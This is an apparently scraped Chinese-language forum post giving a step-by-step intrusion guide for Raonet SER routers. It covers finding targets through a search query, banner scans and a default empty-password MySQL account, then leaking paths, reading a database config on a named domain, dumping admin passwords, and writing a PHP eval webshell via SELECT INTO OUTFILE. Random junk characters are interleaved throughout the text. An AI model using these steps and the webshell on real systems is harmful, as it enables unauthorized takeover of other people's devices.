寻找存在漏洞的路由器方法:1 A: l5 a% u3 P) | O* o
5 e7 m& V4 _+ G5 @0 a. T& n3 ?
1:google搜索'Raonet Subscriber Ethernet Router'
1 f C, Q8 W' g" g9 f/ \3 i
0 o7 f( p% G' f" D- z5 P. @, W2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
& l j6 g5 u5 }' P2 l! S# u* d3 _# e. G" U! C, B7 \+ }) P- E
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
' h# M) S9 ]$ _! Y9 @4 S- j- S) x/ |0 Z
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% e# g) g- J q' s
- J% ~6 b, N6 }- U
- C1 B( s; v$ V, S) v6 ?4 ^; f+ q, v+ J0 W: {9 g
入侵步骤:
T7 k+ z" k' t! Q& @: s' }. h9 x9 h5 l9 N8 V/ |
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php. D( Z* C: j. R. P8 d' ^8 G
- I7 z+ m; S8 k5 M2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc3 g: v* Q( j g
3:得到密码后连接,查看GUI管理密码:
7 T- L% G5 V1 G4 ?( M- ?- y5 Zuse ser_500" L+ a: d9 z# t" H# s
select id,passwd from user;0 k2 w6 m3 a7 H: i V
4:通过数据库写入webshell,执行命令:
2 w; |/ X# C9 A/ V6 Nuse mysql;4 Q7 H) P/ I {; Z; \ S
create table ok(cmd TEXT);
# h4 Y" t' ]4 W; {insert into ok values("<?php @eval($_POST[cmd])?>");6 a m8 e9 M" P9 F
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
: H7 ]8 L6 E/ R# r$ ?( [6 @3 b. |7 i- odrop table ok;
7 C/ H$ \" {; t+ s0 x
5 s/ I2 i) ?& ?* D5:连接后门shell.php F2 R0 ~( a+ M" c2 z
6 `7 T+ t2 c( q0 x' i- M. c P+ w, [
6. 搞定!
* r+ K& o0 E G" ^( q( b. m: F7 J, N0 A) @0 G$ z @: y
|